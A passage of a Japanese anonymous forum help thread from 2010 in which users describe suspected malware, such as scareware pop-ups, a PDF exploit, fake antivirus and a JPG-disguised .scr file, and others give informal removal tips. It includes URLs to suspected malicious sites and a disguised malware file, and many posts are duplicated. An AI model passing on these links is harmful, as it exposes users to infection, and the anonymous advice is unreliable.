ブックマークに登録してあるサイト(http://jakandjil.com/)に行ったら、
あやしい?サイトに飛ばされました。
(gescansecurity.org/?affid=318&subid=landing)
この現象ははじめてです。このサイトのウインドウを閉じようとすると
「http://gescansecurity.org windows security center
Virus,(virus.Win 32.Hidrag.a) was found on your computer!
Crik "OK" to install System Security Antivirus.」
とsafariのダイアログが表示され閉じれませんでしたので、safari強制終了。
セキュリティは、mac osXのファイアウォール。java scriptは可。
ウイルス、スパイウェアですか?
>>440のと同じでしょうか? mac osですけど。
ググってもgescansecurity.orgの情報がなかったので、
どうしたらよいかお願いします。
時計くん
http://www.forest.impress.co.jp/docs/review/20100412_360770.html
動作があやしい、C:\Windows\svchost.exeを作成し、レジストリ登録
してる、WININET.DLLとかもリンクしてるし。
解析中!、おまえらも解析してくれ!
http://www.forest.impress.co.jp/docs/review/20100412_360770.html
動作があやしい、C:\Windows\svchost.exeを作成し、レジストリ登録
してる、WININET.DLLとかもリンクしてるし。
解析中!、おまえらも解析してくれ!
470 :八頭 ◆YAGApwSaEw :2010/04/17(土) 21:52:51
471 :名無しさん@お腹いっぱい。:2010/04/18(日) 20:36:08
【使用OS】Vista
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】 F-SecureIS2010
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】Yes
【スパイウェア対策ソフト】 F-SecureIS2010
【スパイウェア対策ソフトの更新は定期的に行なっているか】 Yes
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
Firefox3.6.3にちょっと古いAcrobat8.1.3Proを入れた状態でPDFを開いたらAcrobatのexploitコードが埋まってたらしくFirefoxごと落ちてウィルス大量検出。
%user%\AppData\Local\temp〜monxga32.exe他20ファイル程ウィルスセット。
但し、ウィルスは正規の手順でファイルが出来たのでリアルタイムスキャンで消された。 bredolabだけが複数箇所に感染。
F-Secureでフルスキャンすると途中で電源が落ちて、OSに入り込んでるのだろうと思って別マシンに繋いでKasperskyでスキャンするとKasperskyが転けると言う訳わからない状態。
とりあえず、落ちる前に検出された3ファイルのみ消去して再度フルスキャンかけるがやっぱり落ちる。
再インストールしか無さそうorz
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】 F-SecureIS2010
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】Yes
【スパイウェア対策ソフト】 F-SecureIS2010
【スパイウェア対策ソフトの更新は定期的に行なっているか】 Yes
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
Firefox3.6.3にちょっと古いAcrobat8.1.3Proを入れた状態でPDFを開いたらAcrobatのexploitコードが埋まってたらしくFirefoxごと落ちてウィルス大量検出。
%user%\AppData\Local\temp〜monxga32.exe他20ファイル程ウィルスセット。
但し、ウィルスは正規の手順でファイルが出来たのでリアルタイムスキャンで消された。 bredolabだけが複数箇所に感染。
F-Secureでフルスキャンすると途中で電源が落ちて、OSに入り込んでるのだろうと思って別マシンに繋いでKasperskyでスキャンするとKasperskyが転けると言う訳わからない状態。
とりあえず、落ちる前に検出された3ファイルのみ消去して再度フルスキャンかけるがやっぱり落ちる。
再インストールしか無さそうorz
472 :名無しさん@お腹いっぱい。:2010/04/20(火) 10:44:01
【使用OS】
Windows7 32bit Pro
【Microsoft Update(MU)の状態】
最新
【使用セキュリティソフトとバージョン】
カスペルスキー2010
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】
起動時に毎回確認
【スパイウェア対策ソフト】
なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】
なし
【ルータの有無】
あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
379の方と同名のHidden.Object.multi.genericを検出。
最初はLocal Settings/Tempにあったため
一時ファイルを全消ししたところ今度はWindows/Tempで検出。
スキャン中に検出したディレクトリを見ていると
どうやら逐次ファイル名が変化している様子。
それ以外は何も検出されなかったものの気持ちがいいものでないので
解決方法を探してここにたどり着いたものの
380の方が提示されたリンクから解決方法に至れずにおります。
セーフモードでのスキャンでは検出が0件でした。
仕事用PCのため、それらしいサイトは閲覧せず心当たりなしです。
よろしく御願いいたします。
Windows7 32bit Pro
【Microsoft Update(MU)の状態】
最新
【使用セキュリティソフトとバージョン】
カスペルスキー2010
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】
起動時に毎回確認
【スパイウェア対策ソフト】
なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】
なし
【ルータの有無】
あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
379の方と同名のHidden.Object.multi.genericを検出。
最初はLocal Settings/Tempにあったため
一時ファイルを全消ししたところ今度はWindows/Tempで検出。
スキャン中に検出したディレクトリを見ていると
どうやら逐次ファイル名が変化している様子。
それ以外は何も検出されなかったものの気持ちがいいものでないので
解決方法を探してここにたどり着いたものの
380の方が提示されたリンクから解決方法に至れずにおります。
セーフモードでのスキャンでは検出が0件でした。
仕事用PCのため、それらしいサイトは閲覧せず心当たりなしです。
よろしく御願いいたします。
473 :名無しさん@お腹いっぱい。:2010/04/21(水) 06:35:11
.scrというファイルを踏んでしまいました
ググったら、原田ウイルスというものらしいんですが
自分でもっているavastスキャンでは反応せず。
トレンドマイクロのオンラインスキャナはwin7では対応してくれないといわれて困ってます・・・
ところで原田ウイルスならば、画像が出てくるらしいのですが
自分の場合、画像などは一切でてきませんでした
これはウイルスではなくてブラフだったりするのでしょうか?
ググったら、原田ウイルスというものらしいんですが
自分でもっているavastスキャンでは反応せず。
トレンドマイクロのオンラインスキャナはwin7では対応してくれないといわれて困ってます・・・
ところで原田ウイルスならば、画像が出てくるらしいのですが
自分の場合、画像などは一切でてきませんでした
これはウイルスではなくてブラフだったりするのでしょうか?
474 :名無しさん@お腹いっぱい。:2010/04/21(水) 18:37:26
【使用OS】 XP
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】Avast 4.8
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 Avast
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
PC再起動したらbridge function controllerというプログラムが立ち上がっていました
プログラム自体には何もなく、下の一覧に存在するだけで、さらに再起動をかけたら今度は起動していませんでした
特に今のところ問題はありませんが、削除しようにもそれらしきプログラムは見付からず
ぐぐっても同様の質問が一件あるだけでした
何方かご存知でしたら情報をお願いします
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】Avast 4.8
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 Avast
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
PC再起動したらbridge function controllerというプログラムが立ち上がっていました
プログラム自体には何もなく、下の一覧に存在するだけで、さらに再起動をかけたら今度は起動していませんでした
特に今のところ問題はありませんが、削除しようにもそれらしきプログラムは見付からず
ぐぐっても同様の質問が一件あるだけでした
何方かご存知でしたら情報をお願いします
475 :名無しさん@お腹いっぱい。:2010/05/04(火) 22:01:43
476 :をじ:2010/05/05(水) 01:50:26
自分もAVE.exeにやられました。
感染源は判明せず、タスクマネージャーでAVE.exeという見慣れないアプリが走っているので、一旦止めその後AVEのありかを探って手動で動かして見たらやはり「XP Defender」が起動するので、こいつを削除しました。
そしたら・・・レジストリを既に書き換えられていたようで、IE、Firefox・・・その他さまざまなアプリ、コンパネも開けない(トホホ)
先にWEBで対策法を調べれば良かった。
感染源は判明せず、タスクマネージャーでAVE.exeという見慣れないアプリが走っているので、一旦止めその後AVEのありかを探って手動で動かして見たらやはり「XP Defender」が起動するので、こいつを削除しました。
そしたら・・・レジストリを既に書き換えられていたようで、IE、Firefox・・・その他さまざまなアプリ、コンパネも開けない(トホホ)
先にWEBで対策法を調べれば良かった。
477 :名無しさん@お腹いっぱい。:2010/05/13(木) 21:57:47
7322.comで感染したんだけど。
デスクトップに消せない。Internet Explorerのアイコンが出て消せないんだけど。
これってどう対処するの?だけれ、対策できや奴いる?
ウィルスバスターでもスルーするんだけど。
あと、この偽装アイコンクリックすると、7322.comにつながるんだけどどうしたらよいでしょうか?
デスクトップに消せない。Internet Explorerのアイコンが出て消せないんだけど。
これってどう対処するの?だけれ、対策できや奴いる?
ウィルスバスターでもスルーするんだけど。
あと、この偽装アイコンクリックすると、7322.comにつながるんだけどどうしたらよいでしょうか?
478 :名無しさん@お腹いっぱい。:2010/05/16(日) 22:30:48
てすと
479 :名無しさん@お腹いっぱい。:2010/05/16(日) 22:37:45
てすてす
480 :名無しさん@お腹いっぱい。:2010/05/18(火) 13:38:11
日大の流出が大騒ぎになってますがこれは流れた瞬間に本人には気がつかないものなんでしょうか
セキュリティーソフトを入れてると思うんですがこれはウイルスにかかった瞬間何をしてるんでしょうか
あと本人はどうやったら知るんでしょうか、落としたファイル例えばmp3とかaviの拡張子だったら安全なんでしょうか
一旦流出したら最初に2ちゃんで大騒ぎになりますがこれは時間にしたら1日もかからないものなんでしょうか
セキュリティーソフトを入れてると思うんですがこれはウイルスにかかった瞬間何をしてるんでしょうか
あと本人はどうやったら知るんでしょうか、落としたファイル例えばmp3とかaviの拡張子だったら安全なんでしょうか
一旦流出したら最初に2ちゃんで大騒ぎになりますがこれは時間にしたら1日もかからないものなんでしょうか
481 :名無しさん@お腹いっぱい。:2010/05/18(火) 13:56:26
はい
482 :名無しさん@お腹いっぱい。:2010/05/18(火) 20:08:08
>>480
> 日大の流出が大騒ぎになってますがこれは流れた瞬間に本人には気がつかないものなんでしょうか
Yes
> セキュリティーソフトを入れてると思うんですがこれはウイルスにかかった瞬間何をしてるんでしょうか
セキュリティソフトは対応するウィルス定義情報(手配書のようなもの)がなければ動けない
加えて、情報流出を起こすような人間はロクにセキュリティ対策していない場合が多い
> あと本人はどうやったら知るんでしょうか、
セキュリティソフトの更新なんかで気付くこともあるが、周りから知らされるのがほとんどかと
> 落としたファイル例えばmp3とかaviの拡張子だったら安全なんでしょうか
No
> 一旦流出したら最初に2ちゃんで大騒ぎになりますがこれは時間にしたら1日もかからないものなんでしょうか
Yes
> 日大の流出が大騒ぎになってますがこれは流れた瞬間に本人には気がつかないものなんでしょうか
Yes
> セキュリティーソフトを入れてると思うんですがこれはウイルスにかかった瞬間何をしてるんでしょうか
セキュリティソフトは対応するウィルス定義情報(手配書のようなもの)がなければ動けない
加えて、情報流出を起こすような人間はロクにセキュリティ対策していない場合が多い
> あと本人はどうやったら知るんでしょうか、
セキュリティソフトの更新なんかで気付くこともあるが、周りから知らされるのがほとんどかと
> 落としたファイル例えばmp3とかaviの拡張子だったら安全なんでしょうか
No
> 一旦流出したら最初に2ちゃんで大騒ぎになりますがこれは時間にしたら1日もかからないものなんでしょうか
Yes
483 :名無しさん@お腹いっぱい。:2010/06/03(木) 17:23:43
たとえばウイニーだとかで流出したらウィニーで流れるの?それとも全インターネットで?
あと例えばウィニーなんかで人知れず誰にも興味をもたれないウィルスってあるんですか
例えば個人情報は全く入ってないドキュメントなんか・・初心者で申し訳ないんですがぜひ教えてください
あと例えばウィニーなんかで人知れず誰にも興味をもたれないウィルスってあるんですか
例えば個人情報は全く入ってないドキュメントなんか・・初心者で申し訳ないんですがぜひ教えてください
484 :名無しさん@お腹いっぱい。:2010/06/04(金) 18:16:52
485 :名無しさん@お腹いっぱい。:2010/06/08(火) 16:58:26
ウイルスバスター先生がウイルスに感染しているっぽいから検索しなさいと言ってきたので検索したところ、
TROJ Generic.DIMというウイルスに感染しているファイルがありました。
ここで、「解決する」→「解決できませんでした」と言われ、じゃぁファイル名がわかってるからと対象のファイルを削除しようとファイルを探すと、ファイルが見つかりません。
この場合どうすれば良いのでしょうか…ていうか、なぜファイルが見つからないのでしょうか…。もち隠しファイルは表示設定です。PC全体を検索しても見つかりませんでした。どなたか教えてください。
TROJ Generic.DIMというウイルスに感染しているファイルがありました。
ここで、「解決する」→「解決できませんでした」と言われ、じゃぁファイル名がわかってるからと対象のファイルを削除しようとファイルを探すと、ファイルが見つかりません。
この場合どうすれば良いのでしょうか…ていうか、なぜファイルが見つからないのでしょうか…。もち隠しファイルは表示設定です。PC全体を検索しても見つかりませんでした。どなたか教えてください。
486 :名無しさん@お腹いっぱい。:2010/06/08(火) 17:09:01
>>485
見えないように隠蔽されているんだろう
プロセスから該当ウイルスを終了させて手動削除するべし
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1023049865
見えないように隠蔽されているんだろう
プロセスから該当ウイルスを終了させて手動削除するべし
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1023049865
487 :名無しさん@お腹いっぱい。:2010/06/12(土) 22:40:35
keygeneとかにウィルスが入ってるので、それらは別PC(ネットワーク接続なし)
で実行してコード吐かせてる
普通の対応?
で実行してコード吐かせてる
普通の対応?
488 :名無しさん@お腹いっぱい。:2010/06/13(日) 00:16:31
普通のわけねえだろ
タダの気違い
タダの気違い
489 :名無しさん@お腹いっぱい。:2010/06/13(日) 00:32:27
俺はなるほどと関心してしまったw
490 :名無しさん@お腹いっぱい。:2010/06/19(土) 22:27:21
Siszpe32.exeくらったやついねぇ?
491 :名無しさん@お腹いっぱい。:2010/06/20(日) 00:26:11
【使用OS】 「XP Home Edition」
【Microsoft Update(MU)の状態】 自動更新(?)のならしています
【使用セキュリティソフトとバージョン】 「McAfee」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「自動更新」
【スパイウェア対策ソフト】 「McAfee」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「自動更新」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「PWCrack-IEPVとPWCrack-MailPassView」が検出されました。
削除してもPCを改めて起動してスキャンするとまた検出されます。
システムレストアの無効化というのを試しても検出されました、このふたつはどうすれば駆除できますか?
【Microsoft Update(MU)の状態】 自動更新(?)のならしています
【使用セキュリティソフトとバージョン】 「McAfee」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「自動更新」
【スパイウェア対策ソフト】 「McAfee」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「自動更新」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「PWCrack-IEPVとPWCrack-MailPassView」が検出されました。
削除してもPCを改めて起動してスキャンするとまた検出されます。
システムレストアの無効化というのを試しても検出されました、このふたつはどうすれば駆除できますか?
492 :名無しさん@お腹いっぱい。:2010/06/20(日) 01:50:57
twitter経由で広がってる、DMを送りつけるスパムらしいけど、これってどんな手法使ったスパムなんでそう?flash?
ttp://www.140kingofpop.com/?platform=twitter&refuid=51922298&source=friends_invite_f
ttp://www.140kingofpop.com/?platform=twitter&refuid=51922298&source=friends_invite_f
493 : ◆ZBzBj0ezFQ :2010/06/22(火) 01:17:22
【使用OS】 「WindowsXP Home SP3」
【Microsoft Update(MU)の状態】 「最後に実行したのは5月7日」
【使用セキュリティソフトとバージョン】 「Norton Internet Security 2010」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なし」
【ルータの有無】 「なし」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「デスクトップ\windowsvista_7.exe(サイズ3.10MB、セキュリティソフトは無反応)」
先ほど、気付いたらいきなりデスクトップに、
「windowsvista_7.exe」なるファイルができていたんですが、
これって何なんでしょう?
ファイルのプロパティを確認してみたけど、ファイルが作成された時刻には、
PCの操作はしていません(PCは起動していたけど)。
ただ、Norton2010のアイドルスキャンが実行されていたと思います。
VirusTotalで確認したけどウィルスとは判定されず。
ネットでファイル名を検索しても特に出てこないし・・・
でも非常に気持ち悪いです。
ご存じの方いらっしゃいますでしょうか?
【Microsoft Update(MU)の状態】 「最後に実行したのは5月7日」
【使用セキュリティソフトとバージョン】 「Norton Internet Security 2010」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なし」
【ルータの有無】 「なし」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「デスクトップ\windowsvista_7.exe(サイズ3.10MB、セキュリティソフトは無反応)」
先ほど、気付いたらいきなりデスクトップに、
「windowsvista_7.exe」なるファイルができていたんですが、
これって何なんでしょう?
ファイルのプロパティを確認してみたけど、ファイルが作成された時刻には、
PCの操作はしていません(PCは起動していたけど)。
ただ、Norton2010のアイドルスキャンが実行されていたと思います。
VirusTotalで確認したけどウィルスとは判定されず。
ネットでファイル名を検索しても特に出てこないし・・・
でも非常に気持ち悪いです。
ご存じの方いらっしゃいますでしょうか?
494 :名無しさん@お腹いっぱい。:2010/06/22(火) 06:38:57
>>493
場所とファイル名を考えたらクロの可能性大だな。
とりあえずファイルを書庫化してバックアップ&削除、ロックかかってたらセーフモードで試す。
その後HijackThisでおかしなエントリがないか調べてみる。
場所とファイル名を考えたらクロの可能性大だな。
とりあえずファイルを書庫化してバックアップ&削除、ロックかかってたらセーフモードで試す。
その後HijackThisでおかしなエントリがないか調べてみる。
495 : ◆ZBzBj0ezFQ :2010/06/22(火) 18:35:49
すみません。自己解決しました。
ずっと前にダウンロードしようとした、ただのドライバファイルでした。
ttp://www.marshal-no1.jp/marujirushi/support/driver.html
このサイトにあるVista/7用のドライバです。
ただ不思議なのは、このファイルをだいぶ前(一ヶ月くらい前)に
ダウンロードしようとした時には、Norton先生に妨害されてダウンロードできなかったのです。
それが何故か昨晩、思い出したようにデスクトップに置かれていました。
一体どうなっているのやら・・・
なお、どうしてドライバファイルだと分かったかというと、
>>494さんのアドバイス通りに書庫化しようとして、
間違って解凍してしまったからです(大恥)
お騒がせしました・・・
ずっと前にダウンロードしようとした、ただのドライバファイルでした。
ttp://www.marshal-no1.jp/marujirushi/support/driver.html
このサイトにあるVista/7用のドライバです。
ただ不思議なのは、このファイルをだいぶ前(一ヶ月くらい前)に
ダウンロードしようとした時には、Norton先生に妨害されてダウンロードできなかったのです。
それが何故か昨晩、思い出したようにデスクトップに置かれていました。
一体どうなっているのやら・・・
なお、どうしてドライバファイルだと分かったかというと、
>>494さんのアドバイス通りに書庫化しようとして、
間違って解凍してしまったからです(大恥)
お騒がせしました・・・
496 :名無しさん@お腹いっぱい。:2010/06/22(火) 22:05:53
http://www.uproda.net/down/uproda104851.jpg
これjpg偽装ファイルでsrcがでてくる
アドレス踏むまでは大丈夫で実行したらアウトみたいなこと書いてあったんだけど
本当ですか?
一応avastがブロックしてくれたっぽいですけど
もし感染してたらどういう症状がでるはずだっていうの知っていれば教えてください
これjpg偽装ファイルでsrcがでてくる
アドレス踏むまでは大丈夫で実行したらアウトみたいなこと書いてあったんだけど
本当ですか?
一応avastがブロックしてくれたっぽいですけど
もし感染してたらどういう症状がでるはずだっていうの知っていれば教えてください
497 :名無しさん@お腹いっぱい。:2010/06/25(金) 16:26:02
【使用OS】 「VISTA SP2」
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 「カスペルキー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「カスペルキー」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンをしてみたところ、trojan.win32.vilselがadobeファイルから検出されました。
トロイに感染したのでしょうか?
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 「カスペルキー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「カスペルキー」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンをしてみたところ、trojan.win32.vilselがadobeファイルから検出されました。
トロイに感染したのでしょうか?
498 :名無しさん@お腹いっぱい。:2010/06/26(土) 07:57:37
検出されました
499 :名無しさん@お腹いっぱい。:2010/06/26(土) 13:00:14
今恥ずかしいポエムを書いてるとこなんですが流出ってこれらのファイルも流出するってこと?
500 :名無しさん@お腹いっぱい。:2010/06/26(土) 23:37:40
>>499
おい、あれお前のポエムだったのかよ・・・
おい、あれお前のポエムだったのかよ・・・
501 :名無しさん@お腹いっぱい。:2010/06/30(水) 23:25:55
最近になって途中で急に回線が切断されるのですが原因不明です
助けてください!
助けてください!
502 :名無しさん@お腹いっぱい。:2010/07/03(土) 03:54:26
2ちゃんねる検索した後に
http://cast.adwires.com/index.php?q=Q%2BnrGgFC6So3XEZ7mLa6f2r
WhtO5aboqvNaG5JXAwcK%2FnwsOsDhHACx1sMKa%2FDA1zWNIa%2
FXcGSg%3D&mid=&chid=&pid=&type=jl0006&tc=3366ff&cc=000000&
uc=009900&bdc=cccccc&bgc=ECFFEC&subad=http://
www.adwires.com/subad/600x130.php&ref=http://find.2ch.net/
&hints=&safefilter=0&charset=&offset=0&ma=1&rr=1&n=2&v=2
これと後何種類かの履歴が残ります。
2ちゃんねる検索した後だけ変なURLが履歴に残るのですが
これはどういうウィルスなんでしょうか?
どういう対策をしたらいいでしょうか?
よろしくお願いします。
http://cast.adwires.com/index.php?q=Q%2BnrGgFC6So3XEZ7mLa6f2r
WhtO5aboqvNaG5JXAwcK%2FnwsOsDhHACx1sMKa%2FDA1zWNIa%2
FXcGSg%3D&mid=&chid=&pid=&type=jl0006&tc=3366ff&cc=000000&
uc=009900&bdc=cccccc&bgc=ECFFEC&subad=http://
www.adwires.com/subad/600x130.php&ref=http://find.2ch.net/
&hints=&safefilter=0&charset=&offset=0&ma=1&rr=1&n=2&v=2
これと後何種類かの履歴が残ります。
2ちゃんねる検索した後だけ変なURLが履歴に残るのですが
これはどういうウィルスなんでしょうか?
どういう対策をしたらいいでしょうか?
よろしくお願いします。
503 :名無しさん@お腹いっぱい。:2010/07/03(土) 20:06:55
[仕様OS] XP
[ソフト] Spybot BitDefender
[問題] systemとして msdrv32f.exe msnmsgr.exeが起動される
[参考にしたページ]
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_RBOT.CDD&VSect=T
msdrv32f.exeというプロセスが
2つ同時にsystemとして起動されるようになりました
タスクマネージャを眺めているだけで
何もしなくても(プロセスを削除した後も)
しばらく立つと表示されます
最近ネットが不安定になり
これが原因なのではないかと思っています
何かわかる方がいましたら
力を貸して下さい
[ソフト] Spybot BitDefender
[問題] systemとして msdrv32f.exe msnmsgr.exeが起動される
[参考にしたページ]
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_RBOT.CDD&VSect=T
msdrv32f.exeというプロセスが
2つ同時にsystemとして起動されるようになりました
タスクマネージャを眺めているだけで
何もしなくても(プロセスを削除した後も)
しばらく立つと表示されます
最近ネットが不安定になり
これが原因なのではないかと思っています
何かわかる方がいましたら
力を貸して下さい
504 :名無しさん@お腹いっぱい。:2010/07/03(土) 21:44:01
>>503
ttp://www.virustotal.com/jp/
ここにmsdrv32f.exeとmsnmsgr.exeを投げて確認してみ。
シマンテックやマカフィーやトレンドマイクロなどで黒判定なら
ウイルス名でそれらのベンダーの対処法をみる。
トレンドマイクロの云う所のWORM_RBOT.CDDならMicrosoft Updateをしていないおまいが悪い。
ttp://www.virustotal.com/jp/
ここにmsdrv32f.exeとmsnmsgr.exeを投げて確認してみ。
シマンテックやマカフィーやトレンドマイクロなどで黒判定なら
ウイルス名でそれらのベンダーの対処法をみる。
トレンドマイクロの云う所のWORM_RBOT.CDDならMicrosoft Updateをしていないおまいが悪い。
505 :名無しさん@お腹いっぱい。:2010/07/07(水) 14:15:35
Microsoftupdateでウィルスが入るXP
SP2にもできない現実
ヽ(;▽;)ノ
SP2にもできない現実
ヽ(;▽;)ノ
506 :名無しさん@お腹いっぱい。:2010/07/08(木) 15:21:00
先日からウィルス駆除ソフトが「FakeDoc に感染しました」というメッセージを度々表示しまして、
その駆除方法が分からなくて困ってます。
ウィルス駆除ソフトは、CA Internet security 2010を使用しています。
ググッたら、どうもスパイウェアっぽいようだったので、
別途、Spybot - Search & Destroy でスキャンしてみましたが、なぜか検出されませんでした。
どなたか詳しい方、アドバイスください。よろしくお願いします
その駆除方法が分からなくて困ってます。
ウィルス駆除ソフトは、CA Internet security 2010を使用しています。
ググッたら、どうもスパイウェアっぽいようだったので、
別途、Spybot - Search & Destroy でスキャンしてみましたが、なぜか検出されませんでした。
どなたか詳しい方、アドバイスください。よろしくお願いします
507 :名無しさん@お腹いっぱい。:2010/07/08(木) 21:37:23
508 :名無しさん@お腹いっぱい。:2010/07/09(金) 03:04:32
【使用OS】 「XP sp3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「ウイルスバスター2008」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「最新」
【ルータの有無】 「無し」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「cpqset.exe」
数日前からこのCpqset.exeっていうのが不正変更の監視ログに出るようになりました。
C\Program Files\HPQ\Default Settings\Cpqset.exe
ログ作成日を見るとだいたい1週間に1回の割合で出てます。
ググッたらこんなページがヒットしたんですがこれは下手に弄らず放置した方がいいということなんでしょうか?
http://www.processlibrary.com/ja/directory/files/cpqset
ちなみに使ってるPCはHPのノートですよろしくお願いします。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「ウイルスバスター2008」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「最新」
【ルータの有無】 「無し」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「cpqset.exe」
数日前からこのCpqset.exeっていうのが不正変更の監視ログに出るようになりました。
C\Program Files\HPQ\Default Settings\Cpqset.exe
ログ作成日を見るとだいたい1週間に1回の割合で出てます。
ググッたらこんなページがヒットしたんですがこれは下手に弄らず放置した方がいいということなんでしょうか?
http://www.processlibrary.com/ja/directory/files/cpqset
ちなみに使ってるPCはHPのノートですよろしくお願いします。
509 :名無しさん@お腹いっぱい。:2010/07/16(金) 11:55:25
ウィルスかどうかわからないけど
webページが勝手に切り替わるのはウィルス?
アドレスバー見てると
最初は検索(Google)で出た下の方に表示される正しいアドレスなんだけど
少し・・・1秒くらい経つとページが勝手に特定のページに切り替わって
IEでなるかどうかはしりませんが
愛用してるfirefoxでなります
webページが勝手に切り替わるのはウィルス?
アドレスバー見てると
最初は検索(Google)で出た下の方に表示される正しいアドレスなんだけど
少し・・・1秒くらい経つとページが勝手に特定のページに切り替わって
IEでなるかどうかはしりませんが
愛用してるfirefoxでなります
510 :名無しさん@お腹いっぱい。:2010/07/21(水) 23:36:05
【使用OS】 「WindowsVISTA」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ノートン2010」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「ad-aware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「最新」
【ルータの有無】 「無し」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「無し」
知人から相談されたのですが、こういう症状を聞いたことがなかったので質問させてください
動画をDL中にHDD上の別動画を再生していると、DLしたファイルに再生していた動画が上書きされているとのことです
DLファイルのサイズに動画時間が追従しているそうです
この事象が必ず起こるわけでもないそうです
一時期、ウイルスでデスクトップがキャプチャされるというものが流行ったようですが、その類でこんな症状を引き起こすものがあるのでしょうか?
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ノートン2010」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「ad-aware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「最新」
【ルータの有無】 「無し」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「無し」
知人から相談されたのですが、こういう症状を聞いたことがなかったので質問させてください
動画をDL中にHDD上の別動画を再生していると、DLしたファイルに再生していた動画が上書きされているとのことです
DLファイルのサイズに動画時間が追従しているそうです
この事象が必ず起こるわけでもないそうです
一時期、ウイルスでデスクトップがキャプチャされるというものが流行ったようですが、その類でこんな症状を引き起こすものがあるのでしょうか?
511 :名無しさん@お腹いっぱい。:2010/07/27(火) 02:55:54
無料のレンタルサービス:ナスカ
http://www.nazca.co.jp/
有名なサイトだから大丈夫だと思うんだけど
http://partychat1.nazca.co.jp/
のページの
パーティチャットサンプル
をクリックするとウィルスに感染しました
って出るんだけど、これは何ですかね?
ウィルスには感染してないようにも思えるし
感染してたら嫌だし
ちなみに、ウィルスバスターは無反応で
ブラウザ上で、ウィルスに感染しました
と出るだけ。
まったくもって意味不明の理解不能で
誰か解説出来る人います?
http://www.nazca.co.jp/
有名なサイトだから大丈夫だと思うんだけど
http://partychat1.nazca.co.jp/
のページの
パーティチャットサンプル
をクリックするとウィルスに感染しました
って出るんだけど、これは何ですかね?
ウィルスには感染してないようにも思えるし
感染してたら嫌だし
ちなみに、ウィルスバスターは無反応で
ブラウザ上で、ウィルスに感染しました
と出るだけ。
まったくもって意味不明の理解不能で
誰か解説出来る人います?
512 :名無しさん@お腹いっぱい。:2010/08/06(金) 05:08:16
